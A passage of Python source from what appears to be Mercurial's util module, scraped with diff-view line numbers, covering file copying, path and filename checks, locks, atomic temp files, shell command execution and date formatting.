    return False
1029
1034
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def inner(*args, **kwargs):
        # remember the caller's state so a caller that already disabled gc
        # does not get it re-enabled behind its back
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if wasenabled:
                gc.enable()
    return inner
1052
1057
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op decorator
    nogc = lambda x: x
1056
1061
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # on different drives (Windows), no relative path exists; anchor
        # n2 at root instead
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    # strip the common prefix, then climb out of what remains of n1
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082
1087
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1092
1097
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# tell the i18n machinery where to find translations
i18n.setdatapath(datapath)
1101
1106
# cached path of the 'hg' executable, lazily filled in by hgexecutable()
_hgexecutable = None
1103
1108
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The result is computed once and cached in the module-level
    _hgexecutable.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # explicit override wins
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running from the 'hg' script itself
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1127
1132
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path
1132
1137
def _isstdout(f):
    # truthy when f is the process's real stdout; note this can return
    # None (not False) when f has no fileno() - callers only test truthiness
    fileno = getattr(f, 'fileno', None)
    return fileno and fileno() == sys.__stdout__.fileno()
1136
1141
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0' and True -> '1' so hooks can test flags numerically
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # let spawned commands re-invoke the same hg
    env['HG'] = hgexecutable()
    return env
1151
1156
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        # flush our own stdout so child output is not interleaved wrongly
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # child writes directly to our stdout; no copying needed
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture child stdout+stderr and copy line by line into 'out'
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # on OpenVMS an odd status means success
        rc = 0
    return rc
1178
1183
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a one-frame traceback means the TypeError came from the call
            # itself (bad signature), not from somewhere inside func
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == 1:
                raise error.SignatureError
            raise

    return check
1190
1195
1191 # a whilelist of known filesystems where hardlink works reliably
1196 # a whilelist of known filesystems where hardlink works reliably
1192 _hardlinkfswhitelist = {
1197 _hardlinkfswhitelist = {
1193 'btrfs',
1198 'btrfs',
1194 'ext2',
1199 'ext2',
1195 'ext3',
1200 'ext3',
1196 'ext4',
1201 'ext4',
1197 'hfs',
1202 'hfs',
1198 'jfs',
1203 'jfs',
1199 'reiserfs',
1204 'reiserfs',
1200 'tmpfs',
1205 'tmpfs',
1201 'ufs',
1206 'ufs',
1202 'xfs',
1207 'xfs',
1203 'zfs',
1208 'zfs',
1204 }
1209 }
1205
1210
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat so the copy's timestamps can be
            # disambiguated against it afterwards
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # recreate the link rather than copying its target's contents
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1257
1262
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns (hardlink, num): whether hardlinking was (still) used, and the
    number of files copied.  'progress' is called with a topic and a
    position (None to close the topic).
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking only works within one filesystem; probe devices
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset child progress by files already handled here;
                # closes over 'num', re-read on every call
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # once a link fails, stop trying for the rest of the tree
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1297
1302
# Windows reserved device names: files with one of these basenames cannot
# be created on Windows, regardless of extension.
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# characters that are invalid in Windows file names
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    def _badcomponent(n):
        # return a problem message for one path component, or None if ok
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # 'n not in ".."' is a substring test: it deliberately exempts
        # the "." and ".." components
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
        return None

    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        msg = _badcomponent(n)
        if msg is not None:
            return msg
1350
1355
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    # on Windows, time.clock has higher resolution than time.time
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # preferred when available (Python >= 3.3): monotonic and high-resolution
    timer = time.perf_counter
1360
1365
def makelock(info, pathname):
    """Create a lock at *pathname* whose payload is *info*.

    Prefers an atomically-created symlink whose target carries the data;
    falls back to an exclusively-created regular file where symlinks are
    unavailable.
    """
    try:
        return os.symlink(info, pathname)
    except AttributeError: # no symlink in os
        pass
    except OSError as why:
        # an existing lock must propagate; any other symlink failure
        # means we should try the regular-file scheme below
        if why.errno == errno.EEXIST:
            raise

    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1373
1378
def readlock(pathname):
    """Read back the payload stored in a lock created by makelock()."""
    try:
        return os.readlink(pathname)
    except AttributeError: # no symlink in os
        pass
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported.  In both
        # cases the lock is a regular file written by the fallback path.
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r
1386
1391
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # duck-typed file object without a descriptor: stat by name
        return os.stat(fp.name)
    return os.fstat(fd)
1393
1398
1394 # File system features
1399 # File system features
1395
1400
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    folded = b.upper()
    if folded == b:
        folded = b.lower()
    if folded == b:
        # nothing to fold: no evidence against case sensitivity
        return True
    try:
        s2 = os.lstat(os.path.join(d, folded))
    except OSError:
        # folded name does not exist: the filesystem distinguishes case
        return True
    # same inode under both spellings means case-insensitive
    return s2 != s1
1418
1423
try:
    import re2
    # _re2 is tri-state: None = present but untested, False = unavailable,
    # True = tested and working (set lazily by _re._checkre2)
    _re2 = None
except ImportError:
    _re2 = False
1424
1429
class _re(object):
    """Facade over the 're' module that transparently prefers re2 when the
    bindings are installed and the pattern/flags are compatible."""

    def _checkre2(self):
        # lazily probe that re2 actually works (see issue3964) and cache
        # the verdict in the module-level tri-state _re2
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        usable = _re2 and not (flags & ~(remod.IGNORECASE | remod.MULTILINE))
        if usable:
            # re2 takes no flags argument; express them inline instead
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape

re = _re()
1469
1474
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry name -> on-disk spelling for one directory
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace returns a new string; the result must be assigned,
    # otherwise a '\' separator ends up unescaped inside the character
    # class below and is silently dropped from the separator set.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1512
1517
def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    impl = getattr(osutil, 'getfstype', None)
    if impl is None:
        # platform module offers no implementation
        return None
    return impl(dirpath)
1519
1524
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    probe = linked = openfp = None
    try:
        fd, probe = tempfile.mkstemp(
            prefix='.%s-' % os.path.basename(testfile),
            suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        linked = '%s2~' % probe[:-2]

        oslink(probe, linked)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        openfp = posixfile(linked)
        return nlinks(linked) > 1
    except OSError:
        return False
    finally:
        if openfp is not None:
            openfp.close()
        for leftover in (probe, linked):
            if leftover is None:
                continue
            try:
                os.unlink(leftover)
            except OSError:
                pass
1548
1553
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1553
1558
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    sep = pycompat.ossep
    return path.split(sep)
1561
1566
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    isgui = getattr(osutil, 'isgui', None)
    if isgui:
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
1576
1581
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source does not exist: the (empty) temp file stands in
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # best effort: do not leave a stale temp file behind on failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1617
1622
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # stat: an os.stat_result for the path, or None if it did not exist
        self.stat = stat
1627
1632
1628 @classmethod
1633 @classmethod
1629 def frompath(cls, path):
1634 def frompath(cls, path):
1630 try:
1635 try:
1631 stat = os.stat(path)
1636 stat = os.stat(path)
1632 except OSError as err:
1637 except OSError as err:
1633 if err.errno != errno.ENOENT:
1638 if err.errno != errno.ENOENT:
1634 raise
1639 raise
1635 stat = None
1640 stat = None
1636 return cls(stat)
1641 return cls(stat)
1637
1642
1638 @classmethod
1643 @classmethod
1639 def fromfp(cls, fp):
1644 def fromfp(cls, fp):
1640 stat = os.fstat(fp.fileno())
1645 stat = os.fstat(fp.fileno())
1641 return cls(stat)
1646 return cls(stat)
1642
1647
1643 __hash__ = object.__hash__
1648 __hash__ = object.__hash__
1644
1649
1645 def __eq__(self, old):
1650 def __eq__(self, old):
1646 try:
1651 try:
1647 # if ambiguity between stat of new and old file is
1652 # if ambiguity between stat of new and old file is
1648 # avoided, comparison of size, ctime and mtime is enough
1653 # avoided, comparison of size, ctime and mtime is enough
1649 # to exactly detect change of a file regardless of platform
1654 # to exactly detect change of a file regardless of platform
1650 return (self.stat.st_size == old.stat.st_size and
1655 return (self.stat.st_size == old.stat.st_size and
1651 self.stat.st_ctime == old.stat.st_ctime and
1656 self.stat.st_ctime == old.stat.st_ctime and
1652 self.stat.st_mtime == old.stat.st_mtime)
1657 self.stat.st_mtime == old.stat.st_mtime)
1653 except AttributeError:
1658 except AttributeError:
1654 pass
1659 pass
1655 try:
1660 try:
1656 return self.stat is None and old.stat is None
1661 return self.stat is None and old.stat is None
1657 except AttributeError:
1662 except AttributeError:
1658 return False
1663 return False
1659
1664
    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            # either side has no stat (missing file): not ambiguous
            return False
1694
1699
1695 def avoidambig(self, path, old):
1700 def avoidambig(self, path, old):
1696 """Change file stat of specified path to avoid ambiguity
1701 """Change file stat of specified path to avoid ambiguity
1697
1702
1698 'old' should be previous filestat of 'path'.
1703 'old' should be previous filestat of 'path'.
1699
1704
1700 This skips avoiding ambiguity, if a process doesn't have
1705 This skips avoiding ambiguity, if a process doesn't have
1701 appropriate privileges for 'path'. This returns False in this
1706 appropriate privileges for 'path'. This returns False in this
1702 case.
1707 case.
1703
1708
1704 Otherwise, this returns True, as "ambiguity is avoided".
1709 Otherwise, this returns True, as "ambiguity is avoided".
1705 """
1710 """
1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1711 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 try:
1712 try:
1708 os.utime(path, (advanced, advanced))
1713 os.utime(path, (advanced, advanced))
1709 except OSError as inst:
1714 except OSError as inst:
1710 if inst.errno == errno.EPERM:
1715 if inst.errno == errno.EPERM:
1711 # utime() on the file created by another user causes EPERM,
1716 # utime() on the file created by another user causes EPERM,
1712 # if a process doesn't have appropriate privileges
1717 # if a process doesn't have appropriate privileges
1713 return False
1718 return False
1714 raise
1719 raise
1715 return True
1720 return True
1716
1721
1717 def __ne__(self, other):
1722 def __ne__(self, other):
1718 return not self == other
1723 return not self == other
1719
1724
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if self._fp.closed:
            return
        self._fp.close()
        filename = localpath(self.__name)
        # capture the target's stat before it is replaced, so that
        # timestamp ambiguity against the new file can be detected
        oldstat = self._checkambig and filestat.frompath(filename)
        rename(self._tempname, filename)
        if oldstat and oldstat.stat:
            newstat = filestat.frompath(filename)
            if newstat.isambig(oldstat):
                # stat of changed file is ambiguous to original one
                advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                os.utime(filename, (advanced, advanced))

    def discard(self):
        if self._fp.closed:
            return
        try:
            os.unlink(self._tempname)
        except OSError:
            pass
        self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # keep the changes only when the with-block exited cleanly
        if exctype is not None:
            self.discard()
        else:
            self.close()
1782
1787
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # the parent directories may have become empty; prune them
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1794
1799
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno == errno.ENOENT:
            # already gone: nothing to do
            return
        raise
1802
1807
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as exc:
        if exc.errno == errno.EEXIST:
            return
        if exc.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # cannot recurse any higher
            raise
        # a parent is missing: create it first, then retry
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as exc:
            # Catch EEXIST to handle races
            if exc.errno != errno.EEXIST:
                raise
            return
    if mode is not None:
        os.chmod(name, mode)
1830
1835
def readfile(path):
    """Return the entire binary contents of the file at ``path``."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
1834
1839
def writefile(path, text):
    """Overwrite the file at ``path`` with the bytes ``text``."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
1838
1843
def appendfile(path, text):
    """Append the bytes ``text`` to the file at ``path``."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
1842
1847
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # break very large chunks (> 1MB) into 256KB pieces so that
            # no single huge string ever sits in the queue
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2**18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        needed = l
        out = []
        queue = self._queue
        while needed > 0:
            # refill the queue with roughly 256KB of data
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # Peek at the head chunk instead of popleft() + appendleft():
            # for a partially consumed chunk this avoids two deque
            # mutations and a fresh str for the remainder.
            chunk = queue[0]
            chunklen = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and needed >= chunklen:
                needed -= chunklen
                queue.popleft()
                out.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            unread = chunklen - offset

            # Use all of unconsumed part of chunk.
            if needed >= unread:
                needed -= unread
                queue.popleft()
                # offset == 0 is handled by the branch above, so this
                # never degenerates into a full copy via chunk[0:]
                out.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                out.append(chunk[offset:offset + needed])
                self._chunkoffset += needed
                needed -= unread

        return ''.join(out)
1922
1927
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # when limit hits 0, nbytes is 0 and the short-circuit below
        # skips the read entirely and terminates the generator
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
1943
1948
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        raise Abort(_("negative timestamp: %d") % timestamp,
                    hint=_("check your clock"))
    # offset = UTC wall-clock minus local wall-clock at that instant
    utcwall = datetime.datetime.utcfromtimestamp(timestamp)
    localwall = datetime.datetime.fromtimestamp(timestamp)
    delta = utcwall - localwall
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz
1956
1961
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand the %z/%1/%2 extensions into a "+HHMM"-style offset
        sign = "-" if tz > 0 else "+"
        q, r = divmod(abs(tz) // 60, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    # clamp to the signed 32-bit range that strftime can represent
    d = t - tz
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
